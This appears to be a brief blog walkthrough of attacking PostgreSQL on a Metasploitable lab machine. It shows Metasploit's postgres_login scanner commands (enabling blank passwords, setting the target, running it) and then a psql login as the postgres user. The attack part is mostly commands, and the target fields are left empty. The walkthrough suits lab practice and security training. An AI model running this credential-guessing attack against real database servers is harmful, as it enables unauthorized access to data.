Attack PostgreSQL Server Port 5432 – Metasploitable


Attack PostgreSQL – This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Note that passwords may be either plaintext or MD5 formatted hashes.

Rapid 7

What is PostgreSQL?

PostgreSQL is a powerful, open source object-relational database system with over 30 years of active development that has earned it a strong reputation for reliability, feature robustness, and performance.


Attacking PostgreSQL with Metasploit

Attack PostgreSQL Server
use scanner/postgres/postgres_login
use auxiliary/scanner/postgres/postgres_login
Attack PostgreSQL Server
exploit scanner/postgres/postgres_login
msf5 auxiliary(scanner/postgres/postgres_login) > show options
msf5 auxiliary(scanner/postgres/postgres_login) > set BLANK_PASSWORDS true
msf5 auxiliary(scanner/postgres/postgres_login) > set RHOSTS

Attack PostgreSQL Server

msf5 auxiliary(scanner/postgres/postgres_login) > exploit
Attack PostgreSQL Server
root@poplab:~# psql -h -U postgres -W postgres
Attack PostgreSQL Server

PostgreSQL Security

Leave a Comment

Your email address will not be published. Required fields are marked *